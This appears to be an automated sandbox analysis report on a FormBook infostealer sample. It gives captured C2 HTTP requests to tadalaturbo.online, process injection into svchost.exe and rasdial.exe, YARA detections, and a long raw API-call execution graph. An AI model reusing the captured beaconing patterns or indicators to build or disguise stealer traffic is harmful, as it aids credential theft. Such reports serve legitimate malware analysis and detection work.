                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Accept-Encoding: gzip, deflate
                  Origin: http://www.tadalaturbo.online
                  Referer: http://www.tadalaturbo.online/7o3y/
                  Cache-Control: max-age=0
                  Connection: close
                  Content-Length: 10301
                  Content-Type: application/x-www-form-urlencoded
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Data Raw: 35 36 67 44 3d 36 36 7a 32 6a 6d 53 53 73 51 72 6f 74 61 5a 55 77 78 4d 55 63 5a 45 6a 41 36 58 56 6b 46 55 45 56 6d 52 38 72 37 72 6d 31 6d 6b 6c 57 37 46 4a 74 55 51 63 46 2f 36 77 74 37 4d 43 6e 78 57 68 6a 36 30 6a 6e 35 70 58 64 49 57 56 73 71 48 55 6c 66 45 4c 79 2f 72 62 63 64 65 66 37 53 32 73 68 49 55 33 44 35 49 59 71 79 5a 67 45 69 2f 5a 66 53 77 75 79 4c 44 53 6d 6a 41 65 64 46 72 38 6e 37 37 71 39 71 38 5a 49 30 45 34 34 56 39 63 4d 4a 75 34 79 47 36 42 62 57 46 63 42 70 75 4e 75 66 36 41 65 79 4d 6c 2f 6f 39 48 58 4a 46 5a 67 4a 32 44 4c 68 48 44 74 4b 6c 2b 54 74 45 2b 58 6c 72 36 51 63 55 7a 56 71 6e 65 78 4c 31 61 41 6e 36 54 33 54 59 6a 35 4d 58 35 56 34 35 48 70 74 52 48 32 57 37 4d 5a 49 50 38 58 64 64 31 61 55 4b 4b 31 62 66 7a 39 36 35 65 57 72 4f 6c 43 31 53 4c 54 62 4d 68 4d 54 44 4e 63 73 45 6b 37 37 67 79 55 77 34 62 34 63 6c 6a 46 52 37 4c 2f 76 46 6a 76 68 55 58 44 6c 6a 41 79 39 37 52 36 59 5a 61 4c 62 4e 55 64 2f 38 55 36 2b 48 57 69 44 75 47 72 42 2b 2b 41 34 4c 6f 36 [TRUNCATED]
                  Data Ascii: 56gD= [TRUNCATED]
                  Timestamp: Sep 4, 2024 09:39:00.656829119 CEST | Bytes transferred: 1121 | Direction: IN
                  HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:39:00 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                  Accept-Ranges: bytes
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Content-Length: 836
                  Content-Type: text/html
                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 [TRUNCATED]
                  Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!22he ?DZe\`ARO++p].#XPCJ2+^]1!Et1L*uD.C6vZ]scrr2]BvrTt>`NlSCl{dd1F_r9>.,<Wum@25p| 8J8-*QXXD,B"^#n$uP"8|]nTqcmTj`pwis87r)VN1,''Le!rGYw_}"+K{!(QJtyzNy >6 owW\AbM(,X(ApJcs$4x5rnOLtaE+(lDcFYZUVu>M7b#Mv`dy:.@<#WJ:!C%hK]ZUBHly?e"AA4HQ_T4#9OFgX/=\^i8woghdk/f9


                  Session ID: 52 | Source IP: 192.168.2.4 | Source Port: 49789 | Destination IP: 192.185.211.122 | Destination Port: 80 | PID: 5440 | Process: C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Timestamp: Sep 4, 2024 09:39:03.925112963 CEST | Bytes transferred: 487 | Direction: OUT
                  GET /7o3y/?gTSpc=Khb8pT&56gD=34bWgTnU4AX1gKZq+j0JMo89G/eR8V4xUDpx7/bRsS0fRbM850xuSZ+vkJ4N+S3djb8r5M9tcI2Ggb3yyq8UxrbVXfSA+Cuoh4JbcMUl7SslS3/OMRxqtpA= HTTP/1.1
                  Host: www.tadalaturbo.online
                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                  Accept-Language: en-US,en;q=0.5
                  Connection: close
                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                  Timestamp: Sep 4, 2024 09:39:04.143879890 CEST | Bytes transferred: 1236 | Direction: IN
                  HTTP/1.1 404 Not Found
                  Date: Wed, 04 Sep 2024 07:39:04 GMT
                  Server: Apache
                  Upgrade: h2,h2c
                  Connection: Upgrade, close
                  Last-Modified: Thu, 29 Sep 2022 21:53:06 GMT
                  Accept-Ranges: bytes
                  Content-Length: 2361
                  Vary: Accept-Encoding
                  Content-Type: text/html
                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 [TRUNCATED]
                  Data Ascii: <!DOCTYPE html><html lang="pt-BR"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="format-detection" content="telephone=no"> <meta name="robots" content="noindex"> <title>Hospedagem de Site com Domínio Grátis - HostGator</title> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96"> <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128"> <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x19
                  Timestamp: Sep 4, 2024 09:39:04.143899918 CEST | Bytes transferred: 224 | Direction: IN
                  Data Raw: 32 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 32 30 2e 70
                  Data Ascii: 2"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-120.png" sizes="120x120"> <link rel="apple-touch-icon" href="/cgi-sys/images/favicons/favicon-152.png" sizes="152x152"> <link rel="apple-
                  Timestamp: Sep 4, 2024 09:39:04.143907070 CEST | Bytes transferred: 1163 | Direction: IN
                  Data Raw: 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 63 67 69 2d 73 79 73 2f 69 6d 61 67 65 73 2f 66 61 76 69 63 6f 6e 73 2f 66 61 76 69 63 6f 6e 2d 31 38 30 2e 70 6e 67 22 20 73 69 7a 65 73 3d 22 31 38 30 78 31 38 30 22 3e 0d 0a 20 20 20 20
                  Data Ascii: touch-icon" href="/cgi-sys/images/favicons/favicon-180.png" sizes="180x180"> <link href="/cgi-sys/css/bootstrap.min.css" rel="stylesheet"> <link href="/cgi-sys/css/fonts.css" rel="stylesheet"> <link href="/cgi-sys/css/custom_404



                  Target ID:0
                  Start time:03:34:54
                  Start date:04/09/2024
                  Path:C:\Users\user\Desktop\220204-TF1--00.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\220204-TF1--00.exe"
                  Imagebase:0x680000
                  File size:1'191'424 bytes
                  MD5 hash:7054B5F008CD2514DB7B7CDA8149978A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:1
                  Start time:03:34:57
                  Start date:04/09/2024
                  Path:C:\Windows\SysWOW64\svchost.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\220204-TF1--00.exe"
                  Imagebase:0xe0000
                  File size:46'504 bytes
                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2032525862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2033124765.0000000004600000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2032793065.0000000003360000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:03:35:25
                  Start date:04/09/2024
                  Path:C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe"
                  Imagebase:0xd30000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4130486749.0000000003040000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                  Reputation:high
                  Has exited:false

                  Target ID:6
                  Start time:03:35:27
                  Start date:04/09/2024
                  Path:C:\Windows\SysWOW64\rasdial.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                  Imagebase:0x390000
                  File size:19'456 bytes
                  MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4130761704.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4130722993.0000000004B90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4129571756.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                  Reputation:moderate
                  Has exited:false

                  Target ID:7
                  Start time:03:35:39
                  Start date:04/09/2024
                  Path:C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\PXpzocSFVzFONOXWptnFWTaDqfnIctMuzRnAPIqOuQavRxzHvBDDaiqcVJ\sXIYDUFnJY.exe"
                  Imagebase:0xd30000
                  File size:140'800 bytes
                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:9
                  Start time:03:35:51
                  Start date:04/09/2024
                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Imagebase:0x7ff6bf500000
                  File size:676'768 bytes
                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true


                    Execution Graph

                    Execution Coverage:4.3%
                    Dynamic/Decrypted Code Coverage:0.4%
                    Signature Coverage:6.9%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:65
API calls 97342->97348 97345 6881a7 59 API calls 97343->97345 97344->97335 97353 6fcaf1 97345->97353 97528 6ea0b5 89 API calls 4 library calls 97346->97528 97355 6fcb46 Mailbox 97348->97355 97353->97346 97358 6fcb48 97353->97358 97526 6fa2d2 341 API calls 97353->97526 97354 6fcb39 97357 6fcb3d 97354->97357 97354->97358 97533 6d66f4 59 API calls Mailbox 97355->97533 97356 6fcb7d 97356->97346 97359 6fcb98 97356->97359 97527 6e9ea3 89 API calls 4 library calls 97357->97527 97358->97346 97504 6fa1f2 97358->97504 97359->97342 97362 6fcbc2 97359->97362 97362->97364 97365 6fcc0b 97362->97365 97363 6fcc36 97363->97312 97364->97355 97529 6e77cf 97364->97529 97366 6fc9f3 341 API calls 97365->97366 97366->97355 97367->97291 97368->97304 97369->97271 97370->97314 97371->97314 97372->97266 97373->97267 97374->97278 97375->97305 97377 68f61a 97376->97377 97378 68f7b0 97376->97378 97379 6c4848 97377->97379 97380 68f626 97377->97380 97381 687f41 59 API calls 97378->97381 97712 6fbf80 341 API calls Mailbox 97379->97712 97710 68f3f0 341 API calls 2 library calls 97380->97710 97387 68f6ec Mailbox 97381->97387 97384 6c4856 97388 68f790 97384->97388 97713 6ea0b5 89 API calls 4 library calls 97384->97713 97386 68f65d 97386->97384 97386->97387 97386->97388 97390 68f743 97387->97390 97618 6ecde5 97387->97618 97698 6fe24b 97387->97698 97701 684faa 97387->97701 97707 6e3e73 97387->97707 97388->97314 97390->97388 97711 689df0 59 API calls Mailbox 97390->97711 97395->97299 97396->97306 97397->97313 98678 6882e0 97398->98678 97400 68fe9d 97401 6c4b57 97400->97401 97447 690856 97400->97447 98683 68f394 97400->98683 98786 6ea0b5 89 API calls 4 library calls 97401->98786 97405 6c4b6c 97406 68ff9e 97407 6c4cb7 97406->97407 97411 68ffac 97406->97411 98790 6d6c62 59 API calls 2 library calls 97406->98790 97407->97405 97407->97411 98792 6fa5ee 85 API calls Mailbox 97407->98792 97408 690677 97413 6a0ff6 Mailbox 59 API calls 97408->97413 97410 6c4c01 97410->97405 98788 6ea0b5 89 API calls 4 library 
calls 97410->98788 97417 6c4d23 97411->97417 97467 6c4f7d 97411->97467 98687 6884dc 97411->98687 97424 6906a5 _memmove 97413->97424 97414 6c4c72 98791 6d6665 59 API calls 2 library calls 97414->98791 97425 6c4d41 97417->97425 98794 688720 59 API calls Mailbox 97417->98794 97420 6c4b7f 97420->97410 98787 68f803 341 API calls 97420->98787 97422 6c4cdc Mailbox 97422->97411 98793 6d6c62 59 API calls 2 library calls 97422->98793 97432 6a0ff6 Mailbox 59 API calls 97424->97432 97429 6c4d52 97425->97429 98795 688720 59 API calls Mailbox 97425->98795 97426 690004 97435 690092 97426->97435 97436 6c4f00 97426->97436 97464 6902d9 Mailbox _memmove 97426->97464 97427 6c4c95 97430 68a000 341 API calls 97427->97430 97429->97464 98796 6d6621 59 API calls Mailbox 97429->98796 97430->97407 97431 6a0ff6 59 API calls Mailbox 97440 68ff33 97431->97440 97460 690266 _memmove 97432->97460 97437 6a0ff6 Mailbox 59 API calls 97435->97437 98800 6e9d71 60 API calls 97436->98800 97442 690099 97437->97442 97440->97405 97440->97406 97440->97408 97440->97420 97440->97424 97440->97431 97441 68a000 341 API calls 97440->97441 97452 6c4c36 97440->97452 97441->97440 97442->97447 98694 690b30 97442->98694 97443 68a000 341 API calls 97445 6c4eb1 97443->97445 97445->97405 97450 688620 69 API calls 97445->97450 97446 690112 97446->97424 97446->97447 97455 690146 97446->97455 98785 6ea0b5 89 API calls 4 library calls 97447->98785 97454 6c4edc 97450->97454 98789 6ea0b5 89 API calls 4 library calls 97452->98789 98799 6ea0b5 89 API calls 4 library calls 97454->98799 97459 6881a7 59 API calls 97455->97459 97462 690167 97455->97462 97458 689e9c 60 API calls 97458->97464 97459->97462 97460->97464 97477 6902c2 97460->97477 98784 689df0 59 API calls Mailbox 97460->98784 97461 6a0ff6 59 API calls Mailbox 97461->97464 97462->97447 97465 6c4f4e 97462->97465 97469 6901ac 97462->97469 97463 6904f8 97463->97314 97464->97447 97464->97454 97464->97458 97464->97461 97464->97463 97471 6c4e46 97464->97471 97476 6c4e77 
97464->97476 98782 6888a0 68 API calls __cinit 97464->98782 98783 6887c0 68 API calls 97464->98783 98797 6e5bd9 68 API calls 97464->98797 98798 688b13 69 API calls Mailbox 97464->98798 97466 689e9c 60 API calls 97465->97466 97466->97467 97467->97405 98801 6ea0b5 89 API calls 4 library calls 97467->98801 97468 690238 97470 689e9c 60 API calls 97468->97470 97469->97447 97469->97467 97469->97468 97472 69024b 97470->97472 97473 6a0ff6 Mailbox 59 API calls 97471->97473 97472->97447 98771 68843f 97472->98771 97473->97476 97476->97443 97477->97314 97478->97312 97479->97290 97481 6899ab 97480->97481 97482 6899b1 97480->97482 97481->97302 97483 6bf9fc __i64tow 97482->97483 97484 6899f9 97482->97484 97488 6899b7 __itow 97482->97488 97489 6bf903 97482->97489 98880 6a38d8 83 API calls 3 library calls 97484->98880 97487 6a0ff6 Mailbox 59 API calls 97490 6899d1 97487->97490 97488->97487 97491 6a0ff6 Mailbox 59 API calls 97489->97491 97496 6bf97b Mailbox _wcscpy 97489->97496 97490->97481 97492 687f41 59 API calls 97490->97492 97493 6bf948 97491->97493 97492->97481 97494 6a0ff6 Mailbox 59 API calls 97493->97494 97495 6bf96e 97494->97495 97495->97496 97497 687f41 59 API calls 97495->97497 98881 6a38d8 83 API calls 3 library calls 97496->98881 97497->97496 97498->97292 97500 6a0ff6 Mailbox 59 API calls 97499->97500 97501 6877e8 97500->97501 97502 6a0ff6 Mailbox 59 API calls 97501->97502 97503 6877f6 97502->97503 97503->97335 97512 687f41 97503->97512 97505 6fa247 Mailbox 97504->97505 97506 6fa204 97504->97506 97505->97356 97507 687f41 59 API calls 97506->97507 97508 6fa213 97507->97508 97509 6e77cf 59 API calls 97508->97509 97510 6fa22a 97509->97510 97534 6f9d4c 97510->97534 97513 687f50 __wsetenvp _memmove 97512->97513 97514 6a0ff6 Mailbox 59 API calls 97513->97514 97515 687f8e 97514->97515 97515->97340 97516->97341 97518 687d38 __wsetenvp 97517->97518 97519 687da5 97517->97519 97521 687d4e 97518->97521 97522 687d73 97518->97522 97610 687e8c 97519->97610 97606 688087 59 API calls 
Mailbox 97521->97606 97607 688189 97522->97607 97525 687d56 _memmove 97525->97353 97526->97354 97527->97355 97528->97355 97530 6e77da 97529->97530 97531 6a0ff6 Mailbox 59 API calls 97530->97531 97532 6e77e8 97531->97532 97532->97355 97533->97363 97535 6f9d62 97534->97535 97536 6f9d79 97534->97536 97535->97536 97538 6f9d8b 97535->97538 97580 6f96db 341 API calls Mailbox 97536->97580 97539 6f9dad 97538->97539 97540 6f9d96 97538->97540 97541 6f9de4 97539->97541 97542 6f9db3 97539->97542 97549 6f9e38 97540->97549 97546 6893ea 59 API calls 97541->97546 97548 6f9da8 97541->97548 97576 6893ea 97542->97576 97546->97548 97548->97505 97551 6f9e8e 97549->97551 97552 6f9e78 97549->97552 97600 6f96db 341 API calls Mailbox 97551->97600 97552->97551 97581 6d7a1e 97552->97581 97554 6f9ed9 97554->97551 97555 6f9ee8 97554->97555 97561 6f9f11 97555->97561 97585 6d76c5 97555->97585 97557 6fa055 VariantInit 97566 6fa08a _memset 97557->97566 97562 6f9f8d 97561->97562 97595 6d7096 VariantInit 97561->97595 97563 6f9fc7 97562->97563 97596 6d70dc 107 API calls 97562->97596 97563->97557 97564 6f9fff VariantClear 97563->97564 97564->97563 97565 6fa01e SysAllocString 97564->97565 97565->97563 97567 6fa107 97566->97567 97568 6fa12d 97566->97568 97597 6f96db 341 API calls Mailbox 97567->97597 97598 6e7804 105 API calls Mailbox 97568->97598 97570 6fa126 97572 6fa1bc VariantClear 97570->97572 97573 6fa1cd 97572->97573 97573->97548 97574 6fa149 97574->97572 97599 6e7804 105 API calls Mailbox 97574->97599 97577 6a0ff6 Mailbox 59 API calls 97576->97577 97578 6893f7 97577->97578 97579 6e69a9 92 API calls 97578->97579 97579->97548 97580->97548 97582 6d7a2f __wsetenvp 97581->97582 97584 6d7a41 97581->97584 97582->97584 97601 69fec6 97582->97601 97584->97554 97586 6d76ef 97585->97586 97587 6d7815 SysFreeString 97586->97587 97588 6d78a2 97586->97588 97589 6d7700 97586->97589 97590 6d7821 97586->97590 97587->97590 97588->97589 97588->97590 97591 6d78fc SysFreeString 97588->97591 97592 6d78ec lstrcmpiW 
97588->97592 97589->97561 97590->97589 97605 6d7579 RaiseException 97590->97605 97591->97588 97592->97591 97594 6d791c SysFreeString 97592->97594 97594->97590 97595->97561 97596->97562 97597->97570 97598->97574 97599->97574 97600->97573 97602 69fed0 __wsetenvp 97601->97602 97603 6a0ff6 Mailbox 59 API calls 97602->97603 97604 69fee5 _wcscpy 97603->97604 97604->97584 97605->97590 97606->97525 97608 6a0ff6 Mailbox 59 API calls 97607->97608 97609 688193 97608->97609 97609->97525 97611 687e9a 97610->97611 97613 687ea3 _memmove 97610->97613 97611->97613 97614 687faf 97611->97614 97613->97525 97615 687fc2 97614->97615 97617 687fbf _memmove 97614->97617 97616 6a0ff6 Mailbox 59 API calls 97615->97616 97616->97617 97617->97613 97619 6877c7 59 API calls 97618->97619 97620 6ece1a 97619->97620 97621 6877c7 59 API calls 97620->97621 97622 6ece23 97621->97622 97623 6ece37 97622->97623 97910 689c9c 59 API calls 97622->97910 97625 689997 84 API calls 97623->97625 97626 6ece54 97625->97626 97627 6ece76 97626->97627 97628 6ecf55 97626->97628 97633 6ecf85 Mailbox 97626->97633 97629 689997 84 API calls 97627->97629 97714 684f3d 97628->97714 97631 6ece82 97629->97631 97634 6881a7 59 API calls 97631->97634 97633->97390 97637 6ece8e 97634->97637 97635 6ecf81 97635->97633 97636 6877c7 59 API calls 97635->97636 97639 6ecfb6 97636->97639 97642 6eced4 97637->97642 97643 6ecea2 97637->97643 97638 684f3d 136 API calls 97638->97635 97640 6877c7 59 API calls 97639->97640 97641 6ecfbf 97640->97641 97645 6877c7 59 API calls 97641->97645 97644 689997 84 API calls 97642->97644 97646 6881a7 59 API calls 97643->97646 97647 6ecee1 97644->97647 97648 6ecfc8 97645->97648 97649 6eceb2 97646->97649 97650 6881a7 59 API calls 97647->97650 97651 6877c7 59 API calls 97648->97651 97911 687e0b 97649->97911 97654 6eceed 97650->97654 97655 6ecfd1 97651->97655 97918 6e4cd3 GetFileAttributesW 97654->97918 97658 689997 84 API calls 97655->97658 97656 689997 84 API calls 97659 6ecec8 97656->97659 97661 6ecfde 
97658->97661 97662 687c8e 59 API calls 97659->97662 97660 6ecef6 97663 6ecf09 97660->97663 97666 687b52 59 API calls 97660->97666 97738 6846f9 97661->97738 97662->97642 97665 689997 84 API calls 97663->97665 97673 6ecf0f 97663->97673 97668 6ecf36 97665->97668 97666->97663 97667 6ecff9 97789 687b52 97667->97789 97919 6e3a2b 75 API calls Mailbox 97668->97919 97672 6ed03c 97675 6881a7 59 API calls 97672->97675 97673->97633 97674 687b52 59 API calls 97676 6ed019 97674->97676 97677 6ed04a 97675->97677 97676->97672 97679 687d2c 59 API calls 97676->97679 97792 687c8e 97677->97792 97681 6ed02e 97679->97681 97683 687d2c 59 API calls 97681->97683 97682 687c8e 59 API calls 97684 6ed066 97682->97684 97683->97672 97685 687c8e 59 API calls 97684->97685 97686 6ed074 97685->97686 97687 689997 84 API calls 97686->97687 97688 6ed080 97687->97688 97801 6e42ad 97688->97801 97690 6ed091 97691 6e3e73 3 API calls 97690->97691 97692 6ed09b 97691->97692 97693 689997 84 API calls 97692->97693 97697 6ed0cc 97692->97697 97694 6ed0b9 97693->97694 97855 6e93df 97694->97855 97696 684faa 84 API calls 97696->97633 97697->97696 98564 6fcdf1 97698->98564 97700 6fe25b 97700->97390 97702 684fb4 97701->97702 97706 684fbb 97701->97706 97703 6a55d6 __fcloseall 83 API calls 97702->97703 97703->97706 97704 684fca 97704->97390 97705 684fdb FreeLibrary 97705->97704 97706->97704 97706->97705 98674 6e4696 GetFileAttributesW 97707->98674 97710->97386 97711->97390 97712->97384 97713->97388 97920 684d13 97714->97920 97719 684f68 LoadLibraryExW 97930 684cc8 97719->97930 97720 6bdd0f 97721 684faa 84 API calls 97720->97721 97723 6bdd16 97721->97723 97725 684cc8 3 API calls 97723->97725 97727 6bdd1e 97725->97727 97956 68506b 97727->97956 97728 684f8f 97728->97727 97729 684f9b 97728->97729 97730 684faa 84 API calls 97729->97730 97732 684fa0 97730->97732 97732->97635 97732->97638 97735 6bdd45 97964 685027 97735->97964 97739 6877c7 59 API calls 97738->97739 97740 68470f 97739->97740 97741 6877c7 59 API calls 
